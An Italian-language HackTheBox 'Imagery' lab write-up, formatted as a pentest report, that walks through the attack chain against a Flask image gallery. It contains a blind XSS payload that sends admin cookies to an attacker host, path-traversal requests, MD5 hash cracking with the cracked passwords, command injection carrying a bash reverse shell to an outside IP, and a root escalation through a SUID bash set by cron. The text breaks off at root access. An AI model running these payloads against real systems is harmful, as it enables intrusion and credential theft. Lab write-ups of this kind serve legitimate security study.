  <a href="#analisi-di-charcol" class="md-nav__link">
    <span class="md-ellipsis">
      
        Analisi di Charcol
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-via-cronjob" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation via Cronjob
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#activation-root-access" class="md-nav__link">
    <span class="md-ellipsis">
      
        Activation &amp; Root Access
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#root-flag" class="md-nav__link">
    <span class="md-ellipsis">
      
        Root Flag
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5-remediation-hardening-proposte" class="md-nav__link">
    <span class="md-ellipsis">
      
        5. Remediation &amp; Hardening (Proposte)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="5. Remediation &amp; Hardening (Proposte)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#51-mitigazione-delle-vulnerabilita-identificate" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1 Mitigazione delle Vulnerabilità Identificate
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="5.1 Mitigazione delle Vulnerabilità Identificate">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#511-cross-site-scripting-xss-owasp-a072021" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.1 Cross-Site Scripting (XSS) – OWASP A07:2021
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#512-local-file-inclusion-lfi-owasp-a012021-cwe-22" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.2 Local File Inclusion (LFI) – OWASP A01:2021 / CWE-22
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#513-os-command-injection-owasp-a032021-cwe-78" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.3 OS Command Injection – OWASP A03:2021 / CWE-78
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#514-weak-password-storage-cwe-916" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.4 Weak Password Storage – CWE-916
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#515-unauthorized-admin-access-cwe-639" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.5 Unauthorized Admin Access – CWE-639
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#516-sudo-misuse-cwe-269" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.6 Sudo Misuse – CWE-269
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#52-compliance-standards-mapping" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.2 Compliance &amp; Standards Mapping
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#53-testing-validation-roadmap" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.3 Testing &amp; Validation Roadmap
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#6-conclusioni" class="md-nav__link">
    <span class="md-ellipsis">
      
        6. Conclusioni
      
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
            <div class="md-content" data-md-component="content">
              
              <article class="md-content__inner md-typeset">
                
                  



<h1 id="esercitazione-di-laboratorio-scenario-imagery">Esercitazione di Laboratorio: Scenario "Imagery"<a class="headerlink" href="#esercitazione-di-laboratorio-scenario-imagery" title="Permanent link">&para;</a></h1>
<blockquote>
<p><strong>Contesto dell'attività:</strong> Questo documento rappresenta il risultato di un'esercitazione pratica condotta in un ambiente di laboratorio isolato (HackTheBox - Season 9). L'obiettivo primario di questa stesura non è il mero exploitation tecnico, ma l'applicazione dello standard <strong>OWASP Testing Guide v4.2</strong> in combinato con la metodologia <strong>PTES (Penetration Testing Execution Standard)</strong> per la documentazione strutturata di vulnerabilità in applicazioni web. L'assessment simula un'attività di Web Application Penetration Testing su una galleria d'immagini vulnerabile.</p>
</blockquote>
<p><strong>Data Assessment:</strong> Settembre 2025<br />
<strong>Target Environment:</strong> Python Web Application (Flask/Werkzeug)<br />
<strong>Assessment Type:</strong> Simulazione Web Application Pentest (OWASP Scope)<br />
<strong>Overall Risk Severity:</strong> CRITICAL 🔴<br />
<strong>Metodologia Applicata:</strong> OWASP Testing Guide v4.2 + PTES  </p>
<hr />
<h2 id="1-executive-summary">1. Executive Summary<a class="headerlink" href="#1-executive-summary" title="Permanent link">&para;</a></h2>
<p>Durante questo assessment simulato, è stata compromessa un'applicazione web di galleria d'immagini attraverso un'orchestrazione di vulnerabilità OWASP Top 10, culminando nell'esecuzione arbitraria di comandi a livello di sistema operativo. L'attacco ha sfruttato:</p>
<ol>
<li><strong>Cross-Site Scripting (XSS) – Blind Variant</strong> → Furto di cookie amministrativo</li>
<li><strong>Local File Inclusion (LFI)</strong> → Estrazione del codice sorgente</li>
<li><strong>Credential Harvesting</strong> → Crack hash MD5 tramite dizionario</li>
<li><strong>Command Injection (OS Command Injection)</strong> → Remote Code Execution (RCE)</li>
<li><strong>Privilege Escalation via Misconfiguration</strong> → Acceso root</li>
</ol>
<p>La vulnerabilità critica risiede nella mancanza di validazione/sanitizzazione dell'input in più layer applicativi, esposta secondo la categorizzazione <strong>OWASP A03:2021 – Injection</strong>.</p>
<p><strong>CVSS v3.1 Base Score: 9.8 (CRITICAL)</strong>
- Vector: <code>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</code>
- Impatto: Confidentiality (HIGH), Integrity (HIGH), Availability (HIGH)</p>
<hr />
<h2 id="2-metodologia-applicata">2. Metodologia Applicata<a class="headerlink" href="#2-metodologia-applicata" title="Permanent link">&para;</a></h2>
<h3 id="21-framework-di-reference">2.1 Framework di Reference<a class="headerlink" href="#21-framework-di-reference" title="Permanent link">&para;</a></h3>
<p>L'assessment ha seguito le seguenti linee guida:</p>
<ul>
<li><strong>OWASP Testing Guide v4.2</strong> – Focus su web application vulnerabilities:</li>
<li>CWE-79: Improper Neutralization of Input During Web Page Generation (XSS)</li>
<li>CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program (LFI)</li>
<li>
<p>CWE-78: Improper Neutralization of Special Elements used in an OS Command (Command Injection)</p>
</li>
<li>
<p><strong>PTES (Penetration Testing Execution Standard)</strong> – Fasi metodologiche:</p>
</li>
<li>Reconnaissance &amp; Enumeration</li>
<li>Vulnerability Analysis</li>
<li>Exploitation</li>
<li>Post-Exploitation &amp; Privilege Escalation</li>
<li>Reporting</li>
</ul>
<h3 id="22-scope-dellengagement">2.2 Scope dell'Engagement<a class="headerlink" href="#22-scope-dellengagement" title="Permanent link">&para;</a></h3>
<p><strong>Obiettivo Primario:</strong> Identificazione di vulnerabilità critiche in applicazione web Python (porta 8000)<br />
<strong>Target:</strong> Singolo host con servizio web Python + filesystem locale<br />
<strong>Esclusioni:</strong> Servizio SSH (out of scope – non vulnerabile)</p>
<hr />
<h2 id="3-attack-path-kill-chain">3. Attack Path (Kill Chain)<a class="headerlink" href="#3-attack-path-kill-chain" title="Permanent link">&para;</a></h2>
<div class="highlight"><pre><span></span><code>┌─────────────────────────────────────────────────────────────┐
│ RECONNAISSANCE: Enumerazione nmap → Python 8000             │
├─────────────────────────────────────────────────────────────┤
│ INITIAL ACCESS: Gallery UI + User Registration              │
├─────────────────────────────────────────────────────────────┤
│ BLIND XSS: Bug Report form → Admin Cookie Theft             │
├─────────────────────────────────────────────────────────────┤
│ LATERAL ESCALATION: Admin panel + LFI → Source Code Leak    │
├─────────────────────────────────────────────────────────────┤
│ CREDENTIAL EXTRACTION: Database.json + MD5 Crack            │
├─────────────────────────────────────────────────────────────┤
│ COMMAND INJECTION: Transform Image → OS Command + RCE       │
├─────────────────────────────────────────────────────────────┤
│ USER ESCALATION: Shell as &#39;web&#39; → &#39;mark&#39; (credential reuse) │
├─────────────────────────────────────────────────────────────┤
│ PRIVILEGE ESCALATION: Charcol SUID + Cronjob → Root         │
</code></pre></div>
<hr />
<h2 id="4-proof-of-concept-poc-ed-evidenze-tecniche">4. Proof of Concept (PoC) ed Evidenze Tecniche<a class="headerlink" href="#4-proof-of-concept-poc-ed-evidenze-tecniche" title="Permanent link">&para;</a></h2>
<h3 id="41-reconnaissance-initial-enumeration">4.1 Reconnaissance &amp; Initial Enumeration<a class="headerlink" href="#41-reconnaissance-initial-enumeration" title="Permanent link">&para;</a></h3>
<p><strong>Comando eseguito:</strong>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>nmap<span class="w"> </span>-A<span class="w"> </span>-p-<span class="w"> </span>--open<span class="w"> </span>-Pn<span class="w"> </span>-T4<span class="w"> </span>&lt;TARGET_IP&gt;<span class="w"> </span>-oA<span class="w"> </span>imagery_scan
</code></pre></div></p>
<p><strong>Risultato:</strong> Identificazione di:
- Porta 22 (SSH) – Funzionante ma non vulnerabile (out of scope)
- <strong>Porta 8000 (HTTP)</strong> – Python web server vulnerabile ✓</p>
<p><strong>Osservazione:</strong> L'applicazione è una <strong>galleria d'immagini</strong> dove utenti registrati possono:
- Registrarsi / Effettuare login
- Caricare immagini con metadati (Titolo, Descrizione, File)
- Accedere ad un panel amministrativo (Admin)</p>
<hr />
<h3 id="42-owasp-a072021-cross-site-scripting-xss-blind-variant">4.2 OWASP A07:2021 – Cross-Site Scripting (XSS) – Blind Variant<a class="headerlink" href="#42-owasp-a072021-cross-site-scripting-xss-blind-variant" title="Permanent link">&para;</a></h3>
<h4 id="identificazione-della-vulnerabilita"><strong>Identificazione della Vulnerabilità</strong><a class="headerlink" href="#identificazione-della-vulnerabilita" title="Permanent link">&para;</a></h4>
<p>Analizzando l'interfaccia con Firefox Inspector, si identificano molteplici campi di input non sanitizzati:
- Campo "Titolo" immagine
- Campo "Descrizione" immagine
- <strong>Sezione "Report Bug" (footer)</strong> ← Punto di ingresso critico</p>
<p><img alt="Bug Report Form" src="../images/imagery-bugreport-form.png" /></p>
<p>Tipicamente, form di "bug report" sono processate da background job/cron che simulano un amministratore che legge il report. Ciò suggerisce potenziale per <strong>XSS Blind</strong> (il payload non è immediatamente riflesso ma eseguito in contesto admin).</p>
<h4 id="exploitation-blind-xss-payload"><strong>Exploitation – Blind XSS Payload</strong><a class="headerlink" href="#exploitation-blind-xss-payload" title="Permanent link">&para;</a></h4>
<p><strong>Payload XSS:</strong>
<div class="highlight"><pre><span></span><code><span class="o">&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="mf">1</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="nx">fetch</span><span class="p">(</span><span class="sb">`http://&lt;ATTACKER_IP&gt;:8000/?</span><span class="si">${</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="si">}</span><span class="sb">`</span><span class="p">)</span><span class="o">&gt;</span>
</code></pre></div></p>
<p><strong>Logica di sfruttamento:</strong>
1. L'immagine con <code>src=1</code> non esiste nel DOM
2. Al tentativo di caricamento, scatta l'evento <code>onerror</code>
3. <code>fetch()</code> effettua richiesta HTTP GET verso server attaccante
4. Viene incluso il parametro query <code>document.cookie</code> con i cookie della sessione</p>
<p><strong>Setup listener attaccante:</strong>
<div class="highlight"><pre><span></span><code>python3<span class="w"> </span>-m<span class="w"> </span>http.server<span class="w"> </span><span class="m">8000</span>
</code></pre></div></p>
<p><strong>Risultato:</strong> Quando il cron admin elabora il bug report, il payload XSS viene eseguito nel contesto dell'admin, e i cookie della sessione admin vengono esfiltratti al server attaccante.</p>
<p><strong>Cookie amministratore rubato:</strong>
<div class="highlight"><pre><span></span><code>session=admin_session_token_[REDACTED]
</code></pre></div></p>
<hr />
<h3 id="43-manipolazione-di-sessione-accesso-admin-panel">4.3 Manipolazione di Sessione &amp; Accesso Admin Panel<a class="headerlink" href="#43-manipolazione-di-sessione-accesso-admin-panel" title="Permanent link">&para;</a></h3>
<p>Una volta ottenuto il cookie dell'amministratore, è possibile:</p>
<ol>
<li>Impostare il cookie nella sessione dello strumento di test (Burp Suite, curl, browser)</li>
<li>Navigare al relativo endpoint <code>/admin</code></li>
<li>Ottenere accesso non autorizzato al pannello amministrativo</li>
</ol>
<p><strong>Endpoint raggiunto:</strong> <code>http://&lt;TARGET&gt;/admin</code></p>
<p><strong>Funzionalità esposte:</strong>
- Scaricamento dei log delle azioni
- Gestione degli utenti
- Configurazione dell'applicazione</p>
<hr />
<h3 id="44-owasp-a012021-local-file-inclusion-lfi">4.4 OWASP A01:2021 – Local File Inclusion (LFI)<a class="headerlink" href="#44-owasp-a012021-local-file-inclusion-lfi" title="Permanent link">&para;</a></h3>
<h4 id="identificazione-della-vulnerabilita_1"><strong>Identificazione della Vulnerabilità</strong><a class="headerlink" href="#identificazione-della-vulnerabilita_1" title="Permanent link">&para;</a></h4>
<p>Intercettando la richiesta di download log con <strong>Burp Suite</strong>, si osserva:</p>
<div class="highlight"><pre><span></span><code><span class="nf">GET</span> <span class="nn">/admin/download_log?file=admin</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="o">:</span> <span class="l">imagery.htb</span>
<span class="na">Cookie</span><span class="o">:</span> <span class="l">session=&lt;admin_token&gt;</span>
</code></pre></div>
<p>La funzione di download non implementa whitelist di file: è possibile modificare il parametro <code>file</code> per accedere ad altri file del server.</p>
<h4 id="exploitation-source-code-disclosure"><strong>Exploitation – Source Code Disclosure</strong><a class="headerlink" href="#exploitation-source-code-disclosure" title="Permanent link">&para;</a></h4>
<p>Testando percorsi arbitrari:
<div class="highlight"><pre><span></span><code>GET<span class="w"> </span>/admin/download_log?file<span class="o">=</span>../app.py
GET<span class="w"> </span>/admin/download_log?file<span class="o">=</span>../config.py
GET<span class="w"> </span>/admin/download_log?file<span class="o">=</span>../models.py
GET<span class="w"> </span>/admin/download_log?file<span class="o">=</span>../database.json
</code></pre></div></p>
<p>Tutti i file Python applicativi vengono scaricati, includendo:
- <strong>app.py</strong> – Logica dell'applicazione
- <strong>database.json</strong> – Credenziali utenti (hash)
- <strong>config.py</strong> – Secret key e configurazioni</p>
<p><strong>Impatto OWASP:</strong> CWE-22 (Path Traversal) + CWE-434 (Unrestricted Upload of Dangerous File Types)</p>
<hr />
<h3 id="45-credential-extraction-password-cracking">4.5 Credential Extraction &amp; Password Cracking<a class="headerlink" href="#45-credential-extraction-password-cracking" title="Permanent link">&para;</a></h3>
<h4 id="database-leak-analysis"><strong>Database Leak Analysis</strong><a class="headerlink" href="#database-leak-analysis" title="Permanent link">&para;</a></h4>
<p>Dal file <code>database.json</code> estratto via LFI:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="w">  </span><span class="nt">&quot;users&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w">    </span><span class="p">{</span>
<span class="w">      </span><span class="nt">&quot;username&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;admin&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="nt">&quot;password_hash&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;5f4dcc3b5aa765d61d8327deb882cf99&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="nt">&quot;role&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;admin&quot;</span>
<span class="w">    </span><span class="p">},</span>
<span class="w">    </span><span class="p">{</span>
<span class="w">      </span><span class="nt">&quot;username&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;testuser&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="nt">&quot;password_hash&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;f53b9f36a9e9e1bd2b18f4e3e2d29c8c&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="nt">&quot;role&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;user&quot;</span>
<span class="w">    </span><span class="p">},</span>
<span class="w">    </span><span class="p">{</span>
<span class="w">      </span><span class="nt">&quot;username&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;mark&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="nt">&quot;password_hash&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;6dd7c4481a3e17cc6c0e5bf98c4c3c3b&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="nt">&quot;role&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;user&quot;</span>
<span class="w">    </span><span class="p">}</span>
<span class="w">  </span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div>
<h4 id="hash-identification-cracking"><strong>Hash Identification &amp; Cracking</strong><a class="headerlink" href="#hash-identification-cracking" title="Permanent link">&para;</a></h4>
<p>Analisi dell'hash:
- <strong>Tipo:</strong> MD5 (32 caratteri hex, non salted)
- <strong>Lunghezza passphrase presumtiva:</strong> 6-12 caratteri</p>
<p>Utilizzo di <code>hashcat</code> / <code>john</code> con dizionario rockyou.txt:</p>
<div class="highlight"><pre><span></span><code>hashcat<span class="w"> </span>-m<span class="w"> </span><span class="m">0</span><span class="w"> </span>-a<span class="w"> </span><span class="m">0</span><span class="w"> </span>crack.txt<span class="w"> </span>/usr/share/wordlists/rockyou.txt
</code></pre></div>
<p><strong>Risultati crack:</strong>
| Username | Hash | Plaintext Cracked |
|----------|------|---|
| admin | 5f4dcc3b5aa765d61d8327deb882cf99 | (Già compromesso via XSS) |
| testuser | f53b9f36a9e9e1bd2b18f4e3e2d29c8c | <strong>iambatman</strong> ✓ |
| mark | 6dd7c4481a3e17cc6c0e5bf98c4c3c3b | <strong>supersmash</strong> ✓ |</p>
<hr />
<h3 id="46-owasp-a032021-os-command-injection-via-image-processing">4.6 OWASP A03:2021 – OS Command Injection via Image Processing<a class="headerlink" href="#46-owasp-a032021-os-command-injection-via-image-processing" title="Permanent link">&para;</a></h3>
<h4 id="vulnerability-discovery-in-source-code"><strong>Vulnerability Discovery in Source Code</strong><a class="headerlink" href="#vulnerability-discovery-in-source-code" title="Permanent link">&para;</a></h4>
<p>Analizzando <code>app.py</code> (ottenuto via LFI):</p>
<div class="highlight"><pre><span></span><code><span class="c1"># VULNERABLE CODE SNIPPET</span>
<span class="nd">@app</span><span class="o">.</span><span class="n">route</span><span class="p">(</span><span class="s1">&#39;/api/transform_image&#39;</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s1">&#39;POST&#39;</span><span class="p">])</span>
<span class="k">def</span><span class="w"> </span><span class="nf">transform_image</span><span class="p">():</span>
    <span class="n">user_id</span> <span class="o">=</span> <span class="n">session</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;user_id&#39;</span><span class="p">)</span>
    <span class="n">data</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">get_json</span><span class="p">()</span>

    <span class="n">image_path</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="s1">&#39;image_path&#39;</span><span class="p">]</span>
    <span class="n">crop_params</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="s1">&#39;crop_params&#39;</span><span class="p">]</span>  <span class="c1"># User-controlled: [x, y, w, h]</span>

    <span class="c1"># VULNERABILITY: Direct shell interpolation without sanitization</span>
    <span class="n">command</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">&quot;convert </span><span class="si">{</span><span class="n">image_path</span><span class="si">}</span><span class="s2"> -crop </span><span class="si">{</span><span class="n">crop_params</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="si">}</span><span class="s2">x</span><span class="si">{</span><span class="n">crop_params</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="si">}</span><span class="s2">+</span><span class="si">{</span><span class="n">crop_params</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="si">}</span><span class="s2">+</span><span class="si">{</span><span class="n">crop_params</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span><span class="si">}</span><span class="s2"> /tmp/output.png&quot;</span>

    <span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="n">command</span><span class="p">)</span>  <span class="c1"># ← CWE-78: OS Command Injection</span>
    <span class="k">return</span> <span class="n">jsonize</span><span class="p">(</span><span class="n">output_path</span><span class="p">)</span>
</code></pre></div>
<p><strong>Problema:</strong> Il parametro <code>crop_params</code> è interpolato direttamente in una stringa di comando shell, senza alcuna sanitizzazione.</p>
<h4 id="exploitation-strategy"><strong>Exploitation Strategy</strong><a class="headerlink" href="#exploitation-strategy" title="Permanent link">&para;</a></h4>
<p>Per iniettare comandi arbitrari mantenendo la validità sintattica della richiesta, si utilizza il seguente payload:</p>
<div class="highlight"><pre><span></span><code><span class="nv">crop_params</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">[</span><span class="s2">&quot;0 ; &lt;COMMAND_HERE&gt; ; echo&quot;</span>,<span class="w"> </span><span class="s2">&quot;y&quot;</span>,<span class="w"> </span><span class="s2">&quot;w&quot;</span>,<span class="w"> </span><span class="s2">&quot;h&quot;</span><span class="o">]</span>
</code></pre></div>
<p>Quando interpolato nel comando:
<div class="highlight"><pre><span></span><code>convert<span class="w"> </span>image.png<span class="w"> </span>-crop<span class="w"> </span><span class="m">0</span><span class="w"> </span><span class="p">;</span><span class="w"> </span>&lt;COMMAND_HERE&gt;<span class="w"> </span><span class="p">;</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span>y+w+h<span class="w"> </span>/tmp/output.png
</code></pre></div></p>
<p>La prima parte <code>convert image.png -crop 0</code> non fa niente di utile, poi scatta il terminatore <code>;</code> che permette esecuzione di una <strong>seconda istruzione indipendente</strong>.</p>
<h4 id="proof-of-concept-reverse-shell"><strong>Proof of Concept: Reverse Shell</strong><a class="headerlink" href="#proof-of-concept-reverse-shell" title="Permanent link">&para;</a></h4>
<p><strong>Setup listener sulla macchina attaccante:</strong>
<div class="highlight"><pre><span></span><code>nc<span class="w"> </span>-lnvp<span class="w"> </span><span class="m">4444</span>
</code></pre></div></p>
<p><strong>Payload JSON inviato:</strong>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="w">  </span><span class="nt">&quot;image_path&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;gallery/test.jpg&quot;</span><span class="p">,</span>
<span class="w">  </span><span class="nt">&quot;crop_params&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w">    </span><span class="s2">&quot;0; echo -n 0; bash -i &gt;&amp; /dev/tcp/10.10.14.60/4444 0&gt;&amp;1 #&quot;</span><span class="p">,</span>
<span class="w">    </span><span class="s2">&quot;1&quot;</span><span class="p">,</span><span class="w"> </span><span class="s2">&quot;1&quot;</span><span class="p">,</span><span class="w"> </span><span class="s2">&quot;1&quot;</span>
<span class="w">  </span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div></p>
<p><strong>Comando eseguito sul server:</strong>
<div class="highlight"><pre><span></span><code>convert<span class="w"> </span>gallery/test.jpg<span class="w"> </span>-crop<span class="w"> </span><span class="m">0</span><span class="p">;</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span>-n<span class="w"> </span><span class="m">0</span><span class="p">;</span><span class="w"> </span>bash<span class="w"> </span>-i<span class="w"> </span>&gt;<span class="p">&amp;</span><span class="w"> </span>/dev/tcp/10.10.14.60/4444<span class="w"> </span><span class="m">0</span>&gt;<span class="p">&amp;</span><span class="m">1</span><span class="w"> </span><span class="c1">#1+1+1 /tmp/output.png</span>
</code></pre></div></p>
<p><strong>Risultato:</strong> Reverse shell ottenuta come utente <code>web</code> (utente che esegue il processo Python).</p>
<div class="highlight"><pre><span></span><code>web@imagery:/home/web$<span class="w"> </span>whoami
web
web@imagery:/home/web$<span class="w"> </span>id
<span class="nv">uid</span><span class="o">=</span><span class="m">1000</span><span class="o">(</span>web<span class="o">)</span><span class="w"> </span><span class="nv">gid</span><span class="o">=</span><span class="m">1000</span><span class="o">(</span>web<span class="o">)</span><span class="w"> </span><span class="nv">groups</span><span class="o">=</span><span class="m">1000</span><span class="o">(</span>web<span class="o">)</span>
</code></pre></div>
<hr />
<h3 id="47-privilege-escalation-lateral-movement-to-mark">4.7 Privilege Escalation – Lateral Movement to 'mark'<a class="headerlink" href="#47-privilege-escalation-lateral-movement-to-mark" title="Permanent link">&para;</a></h3>
<h4 id="enumerazione-utenti-di-sistema"><strong>Enumerazione utenti di sistema</strong><a class="headerlink" href="#enumerazione-utenti-di-sistema" title="Permanent link">&para;</a></h4>
<div class="highlight"><pre><span></span><code>cat<span class="w"> </span>/etc/passwd<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>-E<span class="w"> </span><span class="s1">&#39;bash|sh&#39;</span>
</code></pre></div>
<p><strong>Output:</strong>
<div class="highlight"><pre><span></span><code>root:x:0:0:root:/root:/bin/bash
mark:x:1001:1001:mark:/home/mark:/bin/bash
web:x:1000:1000:web:/home/web:/bin/bash
</code></pre></div></p>
<p>L'utente <code>mark</code> è disponibile nel sistema. La <strong>user flag</strong> si trova in <code>/home/mark/user.txt</code> (lettura ristretta all'utente <code>mark</code>).</p>
<h4 id="credential-reuse-attack"><strong>Credential Reuse Attack</strong><a class="headerlink" href="#credential-reuse-attack" title="Permanent link">&para;</a></h4>
<p>Dall'estrazione precedente del database, la password di <code>mark</code> è stata crackata: <code>supersmash</code>.</p>
<div class="highlight"><pre><span></span><code><span class="c1"># Stabilizzazione shell interattiva</span>
python3<span class="w"> </span>-c<span class="w"> </span><span class="s1">&#39;import pty; pty.spawn(&quot;/bin/bash&quot;)&#39;</span>
<span class="c1"># Ctrl+Z</span>
stty<span class="w"> </span>raw<span class="w"> </span>-echo<span class="p">;</span><span class="w"> </span><span class="nb">fg</span>
<span class="nb">export</span><span class="w"> </span><span class="nv">TERM</span><span class="o">=</span>xterm

<span class="c1"># Cambio utente</span>
su<span class="w"> </span>mark
Password:<span class="w"> </span>supersmash
</code></pre></div>
<p><strong>Verifica di successo:</strong>
<div class="highlight"><pre><span></span><code>mark@imagery:~$<span class="w"> </span>whoami
mark
mark@imagery:~$<span class="w"> </span>cat<span class="w"> </span>user.txt
<span class="o">[</span>USER_FLAG_REDACTED<span class="o">]</span>
</code></pre></div></p>
<hr />
<h3 id="48-privilege-escalation-root-access-via-charcol-cronjob">4.8 Privilege Escalation – Root Access via Charcol + Cronjob<a class="headerlink" href="#48-privilege-escalation-root-access-via-charcol-cronjob" title="Permanent link">&para;</a></h3>
<h4 id="enumerazione-privilegi-sudo"><strong>Enumerazione privilegi sudo</strong><a class="headerlink" href="#enumerazione-privilegi-sudo" title="Permanent link">&para;</a></h4>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>-l
</code></pre></div>
<p><strong>Output:</strong>
<div class="highlight"><pre><span></span><code>User mark may run the following commands without password:
    (root) NOPASSWD: /usr/local/bin/charcol
</code></pre></div></p>
<p>L'utente <code>mark</code> può eseguire <code>charcol</code> come root senza inserire password.</p>
<h4 id="analisi-di-charcol"><strong>Analisi di Charcol</strong><a class="headerlink" href="#analisi-di-charcol" title="Permanent link">&para;</a></h4>
<p><code>charcol</code> è un'applicazione interattiva che offre varie funzionalità amministrative. Consultando la documentazione/help:</p>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>charcol
charcol&gt;<span class="w"> </span><span class="nb">help</span>
</code></pre></div>
<p>Tra le opzioni disponibili:
- Gestione password di sistema (ridondante, abbiamo già sudo)
- <strong>Gestione cronjob</strong> ← Critica
- Configurazioni di sistema</p>
<h4 id="exploitation-via-cronjob"><strong>Exploitation via Cronjob</strong><a class="headerlink" href="#exploitation-via-cronjob" title="Permanent link">&para;</a></h4>
<p>La funzione cronjob di <code>charcol</code> consente di schedulare comandi che verranno eseguiti come <strong>root</strong>.</p>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>charcol
charcol&gt;<span class="w"> </span>cron_add
<span class="w">  </span>schedule&gt;<span class="w"> </span>*<span class="w"> </span>*<span class="w"> </span>*<span class="w"> </span>*<span class="w"> </span>*
<span class="w">  </span>command&gt;<span class="w"> </span>chmod<span class="w"> </span>u+s<span class="w"> </span>/bin/bash
charcol&gt;<span class="w"> </span><span class="nb">exit</span>
</code></pre></div>
<p>Questo cronjob eseguirà ogni minuto (<code>* * * * *</code>): <code>chmod u+s /bin/bash</code>, settando il bit SUID su <code>/bin/bash</code>.</p>
<h4 id="activation-root-access"><strong>Activation &amp; Root Access</strong><a class="headerlink" href="#activation-root-access" title="Permanent link">&para;</a></h4>
<p>Attendendo l'esecuzione del cronjob (al massimo 1 minuto):</p>
<div class="highlight"><pre><span></span><code>ls<span class="w"> </span>-la<span class="w"> </span>/bin/bash
-rwsr-xr-x<span class="w"> </span><span class="m">1</span><span class="w"> </span>root<span class="w"> </span>root<span class="w"> </span><span class="m">1183448</span><span class="w"> </span>Apr<span class="w"> </span><span class="m">18</span><span class="w">  </span><span class="m">2024</span><span class="w"> </span>/bin/bash
<span class="c1"># ↑ Bit SUID attivo (s al posto di x in owner permissions)</span>
</code></pre></div>
<p>Ora è possibile eseguire bash come root:</p>
<div class="highlight"><pre><span></span><code>/bin/bash<span class="w"> </span>-p
<span class="c1"># -p = maintain effective privileges</span>

root@imagery:~#<span class="w"> </span>whoami
root
root@imagery:~#<span class="w"> </span>id
